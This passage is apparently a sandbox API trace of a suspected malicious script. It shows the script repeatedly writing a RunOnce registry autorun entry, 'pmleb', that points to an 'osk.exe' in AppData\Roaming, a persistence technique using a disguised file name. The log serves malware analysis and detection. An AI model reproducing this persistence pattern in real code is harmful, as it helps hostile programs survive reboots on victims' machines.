(This=0x7b4480) returned 0x1 [0079.896] SetTimer (hWnd=0x20280, nIDEvent=0x2058, uElapse=0xa, lpTimerFunc=0x0) returned 0x2058 [0079.897] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0079.909] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0079.909] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0079.909] KillTimer (hWnd=0x20280, uIDEvent=0x2058) returned 1 [0079.909] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0079.909] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0079.909] IUnknown:Release (This=0x787518) returned 0x1 [0079.909] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, 
riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0079.909] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0079.909] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0079.910] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0079.910] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0079.910] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: 
ppvObject=0x33ef50*=0x0) returned 0x80004002 [0079.910] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0079.910] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0079.910] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0079.910] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x59 [0079.910] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0079.910] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x5a [0079.910] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0079.911] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x59 [0079.911] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0079.911] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0079.911] IUnknown:Release (This=0x7a9740) returned 0x1 [0079.911] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0079.911] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0079.911] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0079.911] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0079.911] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0079.911] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0079.911] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0079.911] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", 
cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0079.912] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0079.912] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0079.912] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0079.912] RegCloseKey (hKey=0x280) returned 0x0 [0079.912] IUnknown:Release (This=0x7a9740) returned 0x1 [0079.912] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0079.912] SetTimer (hWnd=0x20280, nIDEvent=0x2059, uElapse=0xa, lpTimerFunc=0x0) returned 0x2059 [0079.912] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0079.924] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0079.924] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0079.925] KillTimer (hWnd=0x20280, uIDEvent=0x2059) returned 1 [0079.925] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0079.925] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0079.925] IUnknown:Release (This=0x787518) returned 0x1 [0079.925] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, 
[7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0079.925] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0079.925] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0079.925] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0079.926] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0079.926] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0079.926] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, 
riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0079.926] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0079.926] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0079.926] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x5a [0079.926] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0079.926] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x5b [0079.926] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), 
pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0079.927] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x5a [0079.927] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0079.927] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0079.927] IUnknown:Release (This=0x7a9740) returned 0x1 [0079.927] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0079.927] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0079.927] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0079.927] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0079.927] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0079.927] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0079.927] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0079.927] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, 
lpUsedDefaultChar=0x0) returned 54 [0079.927] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0079.927] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0079.927] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0079.928] RegCloseKey (hKey=0x280) returned 0x0 [0079.928] IUnknown:Release (This=0x7a9740) returned 0x1 [0079.928] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0079.928] SetTimer (hWnd=0x20280, nIDEvent=0x205a, uElapse=0xa, lpTimerFunc=0x0) returned 0x205a [0079.928] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0079.940] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0079.940] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0079.940] KillTimer (hWnd=0x20280, uIDEvent=0x205a) returned 1 [0079.940] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0079.940] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0079.941] IUnknown:Release (This=0x787518) returned 0x1 [0079.941] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) 
returned 0x0 [0079.941] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0079.941] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0079.941] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0079.941] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0079.941] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0079.941] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, 
[7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0079.941] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0079.941] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0079.941] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x5b [0079.941] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0079.941] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x5c [0079.942] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, 
pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0079.942] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x5b [0079.942] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0079.942] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0079.942] IUnknown:Release (This=0x7a9740) returned 0x1 [0079.943] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0079.943] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0079.943] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0079.943] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0079.943] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0079.943] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0079.943] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0079.943] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0079.943] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS 
